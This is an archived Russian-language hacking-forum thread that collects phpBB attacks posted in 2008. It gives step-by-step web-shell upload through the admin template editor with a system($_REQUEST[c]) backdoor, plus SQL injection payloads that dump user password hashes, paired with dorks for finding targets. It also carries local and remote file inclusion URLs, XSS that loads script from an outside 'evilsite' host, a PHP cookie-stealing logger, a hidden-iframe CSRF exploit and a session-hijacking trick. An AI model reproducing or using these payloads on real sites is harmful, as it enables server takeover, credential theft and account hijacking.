ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Заливка шелла - eXtreme Styles
  #21  
Старый 08.03.2008, 02:37
doc Gilberg
Новичок
Регистрация: 27.06.2007
Сообщений: 3
Провел на форуме:
12730

Репутация: 3
По умолчанию Заливка шелла - eXtreme Styles

Я еще не видел такого метода заливки шелла, как использование eXtreme Styles
(*требуется доступ в админку)
Версии: Точно сказать не могу, но 2.0.21-22 поддерживают
Метод:
eXtreme Styles -> Styles Management -> [edit templates]

После этого можно при помощи встроенного(!) редактора файлов вставить необходимый код в страницу
Мой любимый файл attach_rules.php
Им редко кто пользуется, а после заливки туда, можно создать и свой файл


Подробнее:

Все просто, если есть доступ к админке и версия использует "eXtreme Styles"
*я описываю так как есть в доступной мне админке

Ищешь в левом столбце eXtreme Styles, под ним Styles Management, по этой ссылке кликаешь и в правом фрейме смотришь [edit templates], его кликаешь, и попадаешь в интуитивно понятный редактор файлов в forum_root папке, начинаешь естественно(так как это редактор стилей) в папке templates, выходишь на уровень выше, ищешь нужный файл
(для дефейса index.php, для заливки шелла, к примеру, attach_rules.php)

И кликаешь по нему, редактишь его, как надо, т.е. дописываешь в него код шелла(я советую rst-шелл, хоть большой, но качественный, правда АВниками палится)

Потом давишь кнопку отправить(послать, send и тп.)и выбираешь не ФТП метод, а локалсистем, или как то так... и все, прехеходишь по неообходимой тебе ссылке, и видишь свой(или чужой шелл)
___________________________________________
помог? прибавь к репутации

Последний раз редактировалось Elekt; 03.09.2008 в 01:11..
 
Ответить с цитированием

Passive XSS 2.0.22
  #22  
Старый 08.03.2008, 03:10
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию Passive XSS 2.0.22

1) Пассивная XSS: нефильтруется переменная cur_password при замене пароля


2) Opencosmo Security
http://www.opencosmo.com

Author: Alfredo Panzera, Opencosmo Security
Vendor: phpBB.com
Version: 2.0.22

Exploit:
Go to http://[website]/forum/admin/admin_groups.php and into 'Group description:' insert your XSS.


3) PhpBB [profile.php] Permanent Xss Vulnerability
Sep 20 2007 04:35PM
Found By Seph1roth

[POST METHOD]

Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info

Bugged Variable: "selfdes" (Campo "Altre informazioni")

Xss: </textarea>[XSS STRING]

Последний раз редактировалось Elekt; 03.09.2008 в 01:09..
 
Ответить с цитированием

  #23  
Старый 13.03.2008, 18:48
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

SQL Injection

Vulnerable: [phpBB MOD] FileBase

Exploit:
Код:
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
Dork:
Код:
inurl:"filebase.php" "Powered by phpBB
SQL Injection

Vulnerable: Fully Modded phpBB (kb.php)

Exploit:
Код:
kb.php?mode=article&k=1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Dork:
Код:
allinurl :kb.php?mode=article&k
article&k=
"Powered by phpBB © 2001, 2006 phpBB Group"  "Modified by Fully Modded phpBB © 2002, 2006"
 
Ответить с цитированием

phpBB 2.0.23 Session Hijacking
  #24  
Старый 20.03.2008, 15:52
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию phpBB 2.0.23 Session Hijacking

Session Hijacking

Vulnerable: phpBB 2.0.23

PoC:

Когда модератор или администратор форума phpBB 2.0.X закрывает тему, его sessionid отправляется GET'ом:

Код:
http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=[session]
Администратор/модератор должен быть перенаправлен на некую тему атакующего.
Если атакующий разместил в своем посте изображение, то он может видеть referer и тем самым sessionid. И если администратор(модератор) закрывает данную тему, то атакующий получает его sessionid, которую но может использовать для дальнейших атак типа Cross Site Request Forgery

============
Elekt:
В случае запрета [img] можно заюзать удаленную аватарку
============

Автор: NBBN

Последний раз редактировалось Elekt; 03.09.2008 в 01:36..
 
Ответить с цитированием

Заливка шела через темплейты в phpBB3(необходим доступ в админку)
  #25  
Старый 26.03.2008, 03:44
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию Заливка шела через темплейты в phpBB3(необходим доступ в админку)

Заливка шела через темплейты в phpBB3(необходим доступ в админку).

1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:
Код:
<!-- PHP -->
    system($_REQUEST[c]);
<!-- ENDPHP -->

Последний раз редактировалось Elekt; 03.09.2008 в 01:08..
 
Ответить с цитированием

phpBB PJIRC mod local file inclusion
  #26  
Старый 27.03.2008, 20:04
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию phpBB PJIRC mod local file inclusion

LFI

Vulnerable: phpBB PJIRC mod

Vuln script:
Код:
./irc.php:31 include($php_root_path. 'common.' .$phpEx);
PoC:
Код:
http://target.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd
© 0in from DaRk-CodeRs

Последний раз редактировалось iddqd; 27.03.2008 в 20:26..
 
Ответить с цитированием

XSS Private Messagging в Phpbb3
  #27  
Старый 29.03.2008, 14:38
Mo4x
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350

Репутация: 412
По умолчанию XSS Private Messagging в Phpbb3

XSS Private Messagging On PhpBB3

http://www.victimesite.org/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=[page]



Where is:


Цитата:
[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
[page] = Page of your PM
Redirect Code [Ascii --> Hex]:


Цитата:
[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(<script src=http://www.evilsite.org/WaRWolFz/file.js>)

COOKIES GRABBER


Цитата:
<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);

?>
© By Dante90 .

Последний раз редактировалось Mo4x; 29.03.2008 в 14:48..
 
Ответить с цитированием

PhpBB <= 2.0.22 CSRF Add User In Group
  #28  
Старый 21.05.2008, 22:11
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию PhpBB <= 2.0.22 CSRF Add User In Group


PhpBB <= 2.0.22 CSRF Add User In Group

www.hackinginside.altervista.org
Author: Vincy
Email: djvincy@hotmail.it

This CSRF add an user in a group.

Html Exploit By Vincy:

Код HTML:
<html> 
<iframe name="hackinginside" frameborder="0" height="0" width="0"></iframe> 
<form action="http://site.com/path/groupcp.php?g=[GROUP_ID]" method="post" name="vincy" target="hackinginside"> 
<input type="hidden" name="username" value="[YOUR_NAME]"> 
<input type="submit" name="add" value="Add Member"></form> 
<script>document.vincy.submit()</script> 
</html>

Flash Exploit By Nexen:

PHP код:
var username:String "[YOUR_NAME]"
var 
add:String "Add Member"
var 
g:String "[GROUP_ID]"

getURL("http://site.com/path/groupcp.php?g=[GROUP_ID]""_self""POST"); 
 
Ответить с цитированием

phpRaider phpbb3 Bridge 'phpbb3.functions.php Remote File Include Vulnerability
  #29  
Старый 27.05.2008, 00:02
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию phpRaider phpbb3 Bridge 'phpbb3.functions.php Remote File Include Vulnerability


phpRaider phpbb3 Bridge 'phpbb3.functions.php' Remote File Include Vulnerability

http://securityfocus.com

An attacker can exploit this issue via a browser.

Exploit:

http://www.example.com/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.example2.com/s.php
 
Ответить с цитированием

уязвимость в сal_lite
  #30  
Старый 08.06.2008, 15:21
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию уязвимость в сal_lite

уязвимость в сal_lite
Код:
cal_lite.php?id=12&mode=display&cl_d=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Последний раз редактировалось Elekt; 03.09.2008 в 01:10..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости 18 26.01.2007 16:21
Google Code Search облегчит хакерам задачу по поиску уязвимостей Lany Мировые новости 4 16.10.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ